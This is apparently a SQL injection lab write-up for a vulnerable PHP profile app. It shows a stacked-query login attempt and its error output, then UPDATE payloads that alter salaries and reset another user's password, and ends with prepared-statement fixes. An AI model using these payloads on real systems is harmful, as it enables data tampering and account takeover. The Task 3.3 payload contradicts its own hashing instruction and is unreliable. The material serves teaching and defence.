'or Name='Admin';UPDATE credential SET Salary = '88888' WHERE Name='Alice';#  (entered in the username field)
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE credential SET Salary = '88888'WHEREName='Alice';#' and Password='da39' at line 3]
This shows that the text before and after the semicolon is split into two separate statements.
Task 3: SQL Injection Attack on UPDATE Statement
Source code of the edit-profile page:

```php
$hashed_pwd = sha1($input_pwd);
$sql = "UPDATE credential SET
        nickname='$input_nickname',
        email='$input_email',
        address='$input_address',
        Password='$hashed_pwd',
        PhoneNumber='$input_phonenumber'
        WHERE ID=$id;";
$conn->query($sql);
```
Task 3.1: Modify your own salary.
The injection is as follows:

',Salary='99999999'#
Task 3.2: Modify other people's salary.

',salary='1'where name='Boby'#
Task 3.3: Modify other people's password.
First convert nmsl to its SHA-1 hash, then put that value into the password field; only then can you log in with nmsl.

',password='nmsl' wherename='Boby'#
Task 4: Countermeasure — Prepared Statement
The way to prevent SQL injection is to use prepared statements, which separate code from data.
The original code can be rewritten using a prepared statement:

```php
$conn = getDB();
$stmt = $conn->prepare("SELECT name, local, gender FROM USER_TABLE WHERE id = ? and password = ? ");
// Bind parameters to the query
$stmt->bind_param("is", $id, $pwd);
$stmt->execute();
$stmt->bind_result($bind_name, $bind_local, $bind_gender);
$stmt->fetch();
```
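Applying the same countermeasure to the vulnerable edit-profile UPDATE from Task 3, as an added example that is not part of the original write-up or the lab code. It assumes the lab's `getDB()` helper returns a mysqli connection and uses the column names shown above; `updateProfile` is a name chosen here.

```php
<?php
// Added example: the Task 3 edit-profile UPDATE rewritten as a mysqli prepared
// statement. The SQL text is fixed at prepare() time; every user-supplied value
// travels as a bound parameter, so it can only ever be data, never SQL.
// Assumes getDB() (the lab helper) returns a mysqli connection.
function updateProfile(mysqli $conn, int $id, string $nickname, string $email,
                       string $address, string $pwd, string $phone): bool {
    $hashed_pwd = sha1($pwd);   // kept as SHA-1 to match the lab's credential table
    $stmt = $conn->prepare(
        "UPDATE credential
            SET nickname=?, email=?, address=?, Password=?, PhoneNumber=?
          WHERE ID=?"
    );
    if ($stmt === false) {
        throw new RuntimeException("prepare failed: " . $conn->error);
    }
    // Five string parameters in SET order, then the integer ID for WHERE.
    $stmt->bind_param("sssssi", $nickname, $email, $address, $hashed_pwd, $phone, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$conn = getDB();
// A Task 3.1-style nickname is now stored literally as the nickname string.
// Salary is not in the SET list and the bound value cannot add it, so the
// row's Salary column is untouched.
updateProfile($conn, 1, "',Salary='99999999'#", "alice@example.com",
              "1 Main St", "secret", "555-0100");
```

After the call, `SELECT nickname, Salary FROM credential WHERE ID=1` shows the injection string sitting in `nickname` and the original salary unchanged, which is the check to run when verifying the fix.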